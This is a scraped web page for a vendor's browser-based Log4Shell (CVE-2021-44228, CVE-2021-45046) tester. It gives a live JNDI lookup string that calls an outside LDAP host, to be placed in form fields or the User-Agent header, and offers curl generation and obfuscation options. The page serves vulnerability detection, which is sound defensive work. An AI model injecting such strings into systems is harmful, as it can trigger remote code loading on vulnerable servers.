web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability

This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.

It allows you to generate a request that you can run in your environment and test if the server is vulnerable.

There are three options for using this tool:

  • Use the generated JNDI snapshot and add that entry to any of the form fields on the site or add this to the HTTP Header for User-Agent.
    • Your unique JNDI snapshot is ${jndi:ldap://log4j-tester.trendmicro.com:1389/b64c656f-ffcb-4fda-a06b-a4b8753e03cb}
  • For Internal Server: Generate a quick curl command to test your servers.
  • For Public Facing Server: Just provide the address of the server and we will try to create a simulated query. Make sure you are hitting some API endpoint/form which eventually does an action in the backend. If the unique ID provided here shows up in the results section below, the server may be vulnerable and should be investigated further. If it does not show up, it does not guarantee that the server is not vulnerable.

To learn more on how to use this tool, please visit https://www.youtube.com/watch?v=7uix6nDoLBs. The use of this tool is subject to the Trend Micro Free Tools Terms and Conditions.

Testing

Use the following tool to test your application endpoints.                           GET                           POST                         with User-Agent HTTP Headerwith X-Api-Version Headerwith URL Parameterswith Form Datawith custom HTTP HeaderObfuscate data

  • System environment variables
  • System properties
  • Lower/Upper
  • Lower special

Send request

You can use the generated cURL command below for testing:URL

curl...

 Windows  Mac/Linux

Results

If you submit and see results here, that means the server may be vulnerable and should be investigated further. If there are no results, it does not guarantee that the server is not vulnerable. This table will be refreshed every 10 seconds.

Next refresh in 4 seconds.

Unique IDTimestamp

Information

CVE-2021-44228

“Log4Shell” and “Logjam.” Apache Log4j2 <=2.14.1 is vulnerable to remote code execution by downloading code from LDAP server using JNDI.Read more

CVE-2021-45046

Apache Log4j 2.15.0 is vulnerable to a denial of service (DOS) attack when using ThreadContext values and context lookups.Read more

Protection and Investigation

Analysis and Advisory – From Trend Micro Threat ResearchRead more

Credits

Trend Micro’s vulnerability scanner is based on the following projects:

Exit mobile version